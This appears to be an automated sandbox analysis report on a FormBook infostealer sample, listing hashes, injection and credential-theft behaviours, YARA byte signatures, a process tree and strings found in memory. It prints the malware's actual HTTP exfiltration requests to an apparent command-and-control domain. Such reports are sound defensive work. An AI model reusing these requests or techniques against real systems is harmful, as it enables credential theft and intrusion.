Loading ...

Play interactive tourEdit tour

Analysis Report Dgslimt_Signed_.exe

Overview

General Information

Sample Name:Dgslimt_Signed_.exe
Analysis ID:254519
MD5:738cd543912792b376d1a444c01f2a13
SHA1:9de5396ba7bbb9b413df229948c63dad75cbebf0
SHA256:a678db2b0d3f84a7edaa2c100192a43397a7be3d2c482b34d7bdaf1572f00720

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Dgslimt_Signed_.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\Dgslimt_Signed_.exe' MD5: 738CD543912792B376D1A444C01F2A13)
    • ieinstal.exe (PID: 7036 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 5568 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
        • ieinstal.exe (PID: 4960 cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • ieinstal.exe (PID: 6672 cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Dgsllll[1]SUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth
  • 0x5d56f:$s4: AEAAAAIAAQpVT
  • 0x7ca9f:$s4: AEAAAAIAAQpVT

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18449:$sqlite3step: 68 34 1C 7B E1
    • 0x1855c:$sqlite3step: 68 34 1C 7B E1
    • 0x18478:$sqlite3text: 68 38 2A 90 C5
    • 0x1859d:$sqlite3text: 68 38 2A 90 C5
    • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
    0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.ieinstal.exe.10410000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.ieinstal.exe.10410000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.ieinstal.exe.10410000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18449:$sqlite3step: 68 34 1C 7B E1
        • 0x1855c:$sqlite3step: 68 34 1C 7B E1
        • 0x18478:$sqlite3text: 68 38 2A 90 C5
        • 0x1859d:$sqlite3text: 68 38 2A 90 C5
        • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
        4.2.ieinstal.exe.10410000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.ieinstal.exe.10410000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Dgslimt_Signed_.exeJoe Sandbox ML: detected

          Networking:

          barindex
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /m3px/?RL=4MyE+CpeL4Pkxg37nk0WDQpTsr14l9AWoSemyB7rAQ1tkLL6mKl4JYswWkNQaMP7Hy1d&Rf=hd8d5zxpJVY HTTP/1.1Host: www.thedraftmedic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: POST /m3px/ HTTP/1.1Host: www.thedraftmedic.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.thedraftmedic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedraftmedic.com/m3px/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 4c 3d 77 75 7e 2d 67 6d 45 70 57 34 44 55 78 33 43 6d 34 30 46 77 44 41 6c 39 74 5a 41 75 79 38 73 77 30 56 50 48 72 53 57 38 4f 79 64 68 72 59 72 5f 33 36 51 36 61 49 74 48 55 6d 52 53 61 64 4c 56 59 77 34 4e 65 64 47 30 46 7a 4d 50 34 47 7a 49 57 35 54 36 28 51 35 59 71 38 49 76 68 78 35 51 5a 6c 47 31 6f 67 6d 68 39 52 28 72 58 6c 38 72 39 37 30 44 55 6e 75 37 28 56 75 66 55 6d 52 74 79 44 4a 6a 74 32 57 45 4f 33 6f 68 64 46 30 35 6d 76 61 4d 64 34 55 47 72 75 66 61 41 70 65 41 4a 33 79 4d 30 44 71 33 6d 50 7e 49 4e 6e 68 55 52 61 67 63 6d 47 47 78 6f 6d 32 75 6d 34 36 68 47 64 63 45 59 70 4b 51 72 6b 38 66 36 4e 66 58 56 68 35 34 31 45 6b 65 70 79 39 61 35 45 72 4c 46 74 6b 37 38 34 56 73 72 30 50 31 5a 74 6a 34 4a 72 77 63 53 31 47 50 32 36 54 6e 30 57 4c 53 47 31 76 46 54 47 66 47 75 52 57 6d 32 53 4e 59 31 78 75 36 69 70 58 41 45 69 62 4e 77 32 6f 4d 79 70 61 7a 66 69 78 50 50 74 71 66 66 4f 30 7a 51 71 48 65 44 62 63 65 6d 34 4d 47 49 74 71 6b 77 65 71 58 6d 78 73 55 37 42 30 5f 47 33 4b 43 47 71 4c 54 48 4c 61 30 45 7a 47 6e 74 48 62 68 59 46 76 36 37 33 4a 4a 7e 70 42 51 5a 33 49 70 57 49 70 4a 31 64 70 4c 61 6c 5a 30 4e 6e 39 44 43 77 75 44 6d 62 37 44 36 55 61 54 6a 61 37 53 28 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: RL=wu~-gmEpW4DUx3Cm40FwDAl9tZAuy8sw0VPHrSW8OydhrYr_36Q6aItHUmRSadLVYw4NedG0FzMP4GzIW5T6(Q5Yq8Ivhx5QZlG1ogmh9R(rXl8r970DUnu7(VufUmRtyDJjt2WEO3ohdF05mvaMd4UGrufaApeAJ3yM0Dq3mP~INnhURagcmGGxom2um46hGdcEYpKQrk8f6NfXVh541Ekepy9a5ErLFtk784Vsr0P1Ztj4JrwcS1GP26Tn0WLSG1vFTGfGuRWm2SNY1xu6ipXAEibNw2oMypazfixPPtqffO0zQqHeDbcem4MGItqkweqXmxsU7B0_G3KCGqLTHLa0EzGntHbhYFv673JJ~pBQZ3IpWIpJ1dpLalZ0Nn9DCwuDmb7D6UaTja7S(w).
          Source: global trafficHTTP traffic detected: POST /m3px/ HTTP/1.1Host: www.thedraftmedic.comConnection: closeContent-Length: 167132Cache-Control: no-cacheOrigin: http://www.thedraftmedic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedraftmedic.com/m3px/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 4c 3d 77 75 7e 2d 67 69 52 51 46 59 57 61 6d 79 79 6e 34 6b 31 6f 56 30 68 6a 36 4f 52 79 6c 38 55 43 39 69 28 58 72 53 4b 77 47 51 6c 73 68 59 62 5f 6a 49 34 39 42 59 74 41 46 57 52 52 65 64 33 48 48 7a 6f 56 65 5a 57 4b 46 7a 45 41 74 56 37 4a 59 4a 54 54 77 51 6c 4f 37 4d 63 34 68 79 4e 35 59 42 6a 6f 76 67 71 68 7a 42 33 6c 5a 6b 73 77 36 35 51 47 54 6e 6a 7a 39 52 71 61 55 56 6b 45 78 68 31 56 71 33 36 47 4a 45 31 74 52 6b 6b 42 78 6f 4f 4a 54 49 41 4e 6b 4e 6a 4a 45 49 43 45 4b 32 7a 73 6f 54 47 77 6c 5f 6d 47 62 30 6f 72 55 72 55 70 6c 57 57 44 6f 6e 75 59 76 75 36 38 43 65 34 63 61 38 69 75 6a 78 63 52 77 63 66 31 52 6e 4e 76 6c 33 38 68 6b 54 4e 42 39 56 47 52 45 76 74 6d 7a 35 38 55 6f 42 33 35 52 38 54 71 4b 36 30 55 4e 6c 57 67 78 39 4f 2d 7e 6e 72 61 56 41 33 6e 63 47 65 51 39 42 57 71 34 41 31 4b 78 41 71 78 31 49 48 2d 46 68 37 52 6e 56 74 72 7a 76 58 69 61 47 38 54 49 59 4f 44 55 65 6b 4c 56 4b 4c 56 43 49 41 74 76 59 4e 58 43 49 33 6f 77 65 71 62 6d 7a 56 4a 37 31 63 5f 48 6c 53 76 47 4e 33 6c 4d 72 61 31 49 44 57 6c 6d 58 6e 78 59 42 44 36 37 48 5a 6a 34 61 68 51 4f 78 73 6f 57 70 70 4a 79 74 70 4c 63 6c 59 48 46 57 38 72 55 68 33 30 75 49 76 41 7a 68 6a 33 75 5a 6d 41 6b 59 47 31 55 76 31 46 72 33 56 41 54 4c 5a 59 64 5f 38 46 43 4e 43 68 70 64 75 4d 75 71 48 4b 57 59 68 65 36 63 74 6b 74 48 45 4f 72 59 57 46 57 46 42 68 78 45 30 58 6b 46 66 71 55 33 66 2d 4f 6d 6d 46 71 6d 44 74 79 70 76 57 46 34 55 55 53 34 46 67 38 65 70 66 45 76 67 55 51 2d 67 4a 67 4c 4c 59 6d 6d 48 32 37 5f 6f 75 57 32 32 46 74 6e 70 2d 71 6f 4c 52 38 52 6e 67 64 4a 65 63 4b 61 7a 4c 54 52 4b 52 69 52 44 72 76 68 50 63 74 4b 6c 53 54 4b 4d 47 78 45 4c 4a 66 34 45 79 55 34 41 42 6d 62 76 78 58 4d 4a 46 4e 4e 47 4f 37 33 6d 75 6e 46 53 31 4a 42 76 34 4b 77 45 6a 68 71 34 64 6a 4d 6e 45 47 6c 4d 34 77 74 7a 41 7a 78 50 34 48 36 49 6c 61 50 33 50 7a 49 42 77 6a 58 53 37 68 69 39 7a 4e 34 62 6e 59 38 50 6e 49 32 6f 52 6e 42 6b 42 73 73 6a 51 78 65 67 69 31 58 51 63 28 4d 30 5f 30 5a 51 57 61 45 38 75 6e 4e 43 4f 69 31 45 43 54 71 28 30 31 6f 77 58 47 52 70 48 66 50 54 55 54 62 78 65 6b 64 65 65 34 31 55 7a 58 51 35 31 73 6f 63 56 61 70 4b 6f 57 38 77 33 59 79 4c 75 74 77 79 4d 4c 36 39 61 6e 56 61 4c 63 33 39 38 64 4c 4b 74 64 54 6f 54 4d 65 50 43 34 72 44 41 35 46 45 4b 32 46 32 55 4a 67 72 75 6c 6b 6a 64 52 6f 33 77 4e 48 57 77 75 35 72 79 45 54 5a 46 44 44 58 53 75 55 39 2d 38 36 4e 59 37 76 61 55 6b 78 61 59 67 4a 53 66 52 33 56 6e 6c 75 44 4d 67 6d 7e 45 55 34 61 4e 4f 64 69 6a 65 47 4d 2d 39 61 47 78 48 33 53 43 45 4b 73 77 70 79 76 7a 57 77
          Source: global trafficHTTP traffic detected: GET /m3px/?RL=4MyE+CpeL4Pkxg37nk0WDQpTsr14l9AWoSemyB7rAQ1tkLL6mKl4JYswWkNQaMP7Hy1d&Rf=hd8d5zxpJVY HTTP/1.1Host: www.thedraftmedic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: unknownHTTP traffic detected: POST /m3px/ HTTP/1.1Host: www.thedraftmedic.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.thedraftmedic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedraftmedic.com/m3px/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 4c 3d 77 75 7e 2d 67 6d 45 70 57 34 44 55 78 33 43 6d 34 30 46 77 44 41 6c 39 74 5a 41 75 79 38 73 77 30 56 50 48 72 53 57 38 4f 79 64 68 72 59 72 5f 33 36 51 36 61 49 74 48 55 6d 52 53 61 64 4c 56 59 77 34 4e 65 64 47 30 46 7a 4d 50 34 47 7a 49 57 35 54 36 28 51 35 59 71 38 49 76 68 78 35 51 5a 6c 47 31 6f 67 6d 68 39 52 28 72 58 6c 38 72 39 37 30 44 55 6e 75 37 28 56 75 66 55 6d 52 74 79 44 4a 6a 74 32 57 45 4f 33 6f 68 64 46 30 35 6d 76 61 4d 64 34 55 47 72 75 66 61 41 70 65 41 4a 33 79 4d 30 44 71 33 6d 50 7e 49 4e 6e 68 55 52 61 67 63 6d 47 47 78 6f 6d 32 75 6d 34 36 68 47 64 63 45 59 70 4b 51 72 6b 38 66 36 4e 66 58 56 68 35 34 31 45 6b 65 70 79 39 61 35 45 72 4c 46 74 6b 37 38 34 56 73 72 30 50 31 5a 74 6a 34 4a 72 77 63 53 31 47 50 32 36 54 6e 30 57 4c 53 47 31 76 46 54 47 66 47 75 52 57 6d 32 53 4e 59 31 78 75 36 69 70 58 41 45 69 62 4e 77 32 6f 4d 79 70 61 7a 66 69 78 50 50 74 71 66 66 4f 30 7a 51 71 48 65 44 62 63 65 6d 34 4d 47 49 74 71 6b 77 65 71 58 6d 78 73 55 37 42 30 5f 47 33 4b 43 47 71 4c 54 48 4c 61 30 45 7a 47 6e 74 48 62 68 59 46 76 36 37 33 4a 4a 7e 70 42 51 5a 33 49 70 57 49 70 4a 31 64 70 4c 61 6c 5a 30 4e 6e 39 44 43 77 75 44 6d 62 37 44 36 55 61 54 6a 61 37 53 28 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: RL=wu~-gmEpW4DUx3Cm40FwDAl9tZAuy8sw0VPHrSW8OydhrYr_36Q6aItHUmRSadLVYw4NedG0FzMP4GzIW5T6(Q5Yq8Ivhx5QZlG1ogmh9R(rXl8r970DUnu7(VufUmRtyDJjt2WEO3ohdF05mvaMd4UGrufaApeAJ3yM0Dq3mP~INnhURagcmGGxom2um46hGdcEYpKQrk8f6NfXVh541Ekepy9a5ErLFtk784Vsr0P1Ztj4JrwcS1GP26Tn0WLSG1vFTGfGuRWm2SNY1xu6ipXAEibNw2oMypazfixPPtqffO0zQqHeDbcem4MGItqkweqXmxsU7B0_G3KCGqLTHLa0EzGntHbhYFv673JJ~pBQZ3IpWIpJ1dpLalZ0Nn9DCwuDmb7D6UaTja7S(w).
          Source: explorer.exe, 00000009.00000000.313630372.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.313630372.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.320196812.000000000E929000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
